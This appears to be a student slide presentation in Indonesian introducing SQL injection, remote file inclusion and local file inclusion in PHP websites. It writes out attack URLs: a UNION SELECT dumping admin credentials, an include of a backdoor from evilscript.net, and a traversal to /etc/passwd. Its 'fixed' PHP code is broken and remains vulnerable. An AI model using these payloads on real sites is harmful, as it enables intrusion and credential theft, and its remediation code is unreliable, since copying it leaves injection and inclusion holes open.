OLEH

SAMUEL TANGON

XII TKJ 6

PENETRASI WEBSITE

Nama : Samuel Tangon

TTL : Manado, 17 Mei 1994

Kelas : XII TKJ 6

Sekolah : SMKN 3 Manado

Hobby : Internet Hacking & Games

Biodata

Penetrasi Website ( Web Hacking ) Adalah Suatu Tindakan Untuk Mencari Vulnerable atau Celah

Keamanan Yang Ada Di Dalam Suatu Website.

Pengertian Penetrasi Website

SQL Injection ( Structured Query Language )

RFI ( Remote File Inclusion )

LFI ( Local File Inclusion )

Tipe-Tipe Penetrasi Website

SQL Injection adalah suatu tindakan memanipulasi perintah SQL Database Yang Berada Di Dalam Server dengan memanfaatkan Celah dari Aplikasi Website.

SQL Injection

SQL Injection memungkinkan penyerang dapat mengambil data-data yang ada di dalam database SQL dari Korban. Entah untuk keperluan legal maupun ilegal.

Bahaya SQL Injection

Contoh Website Misalnya : http://localhost/index.php?p=1Jika dalam file index.php terkena vuln, kita

dapat mencari file username dan password yang berada di database SQL dengan mengubah link berikut menjadi,

http://localhost/index.php?p=1+union+select+0,1,2,concat(username,0x3a,password),4+from+admins--

Contoh SQL Injection

RFI adalah salah 1 teknik hacking yang memungkinkan penyerang dapat meng-include kan file yang ada di luar server.

RFI ( Remote File Inclusion )

Bug RFI Sangat berbahaya karena penyerang / attacker dapat langsung meng-includekan file yang berupa backdoor / pintu belakang dari website.

Bahaya RFI

Contoh Website Misalnya :http://www.7crew.co.cc/guestbook.php?page=welcome

Penyerang dapat langsung meng-include / memasukan file backdoor / pintu belakang di dalam website, menjadi :

http://www.7crew.co.cc/guestbook.php?page=http://evilscript.net/backdoor.php

Dengan ini Penyerang dengan mudahnya memasukan file “backdoor.php” ke dalam website korban.

Contoh Penggunaan RFI

Pengertian LFI hampir sama dengan RFI, tapi jika RFI memanggil file di luar server, LFI adalah suatu teknik hacking yang memungkinkan penyerang dapat memanggil file-file yang ada di website atau server korban.

LFI ( Local File Inclusion )

LFI sebenarnya tidak terlalu berbahaya, karena penyerang hanya bisa meng-include file yang ada di dalam server, melalui Link Website.

Bahaya LFI

Contoh Website Misalnyahttp://www.anginribut.com/index.php?var=ribut.php‘Jelas di link ini, file “ribut.php” adalah file yg

di include dari server.”

Jika kita rubah linknya menjadihttp://www.anginribut.com/index.php?var=../../../../../../../etc/

passwd‘Di link ini file ‘passwd’ dalam server linux di-

includekan dan tentunya ini berbahaya.

Contoh Penggunaan LFI

Konfigurasi PHP Pada Server pada File php.ini

Harus Mem-validasi Syntax yang kita gunakan.

How To Fix ?

Di Linux, Edit File di /etc/apache/php/php.iniDi Windows, Edit File diC:\xampp\php\php.ini

Beberapa Line di Bawah Menjadi,

allow_url_include = offallow_url_fopen = offmagic_quotes_gpc = on

Konfigurasi Server pada php.ini

Misalnya Dalam File guestbook.php berisi,

<?php

$id = $_GET['id'];

$result = mysql_query( "SELECT name FROM members WHERE id = '$id'");

?>

Dapat Dilihat Variable “$id” tidak di filter, dengan mudahnya syntax SQL dapat di Injeksi.

Perbaiki dengan menambahkan fungsi “interval” atau “int” di syntax. Menjadi,

<?php

$id = $_GET['id'];

$result = mysql_query( "SELECT name FROM members WHERE id = '$id=(int)$_GET['id']’”;

?>

Validasi Syntax SQL

Misalnya Dalam File bukutamu.php berisi,

<?php

$pagina=$_GET['pagina'];

include $pagina;

?>

Dapat ditambahkan “./” sebelum variable $_GET agar setiap file yang di include di luar server, akan ditambahkan “./” pada setiap link. Ubah Menjadi,

<?php

$pagina=“./”$_GET[‘pagina’];

include $pagina;

?>

Validasi Syntax RFI

Misalnya dalam File index.php berisi,

<?php

$pagina=$_GET['pagina'];

include '/pages/'.$pagina;

?>

Sama Seperti pencegahan Bug RFI, ditambahkan variable “./” sebelum variable $_GET . Ubah Menjadi,

<?php

$pagina=“./”$_GET[‘pagina’];

include ‘/pages/’.$pagina;

?>

Validasi Syntax LFI

Dari Materi tersebut dapat ditarik kesimpulan,

1. Perlu Diperhatikan Konfigurasi server yang digunakan.

2. Untuk setiap Programmer, perlu diperhatikan setiap syntax yang digunakan agar setiap script tidak ada yang terkena Bug.

Kesimpulan

Sumber :

ManadoCoding Community : http://www.manadocoding.org

7Crew Community : http://7crew.co.cc

Inj3ct0r : http://1337db.com

Exploit-DB : http://www.exploit-db.com

Some From Google :P

TERIMA KASIH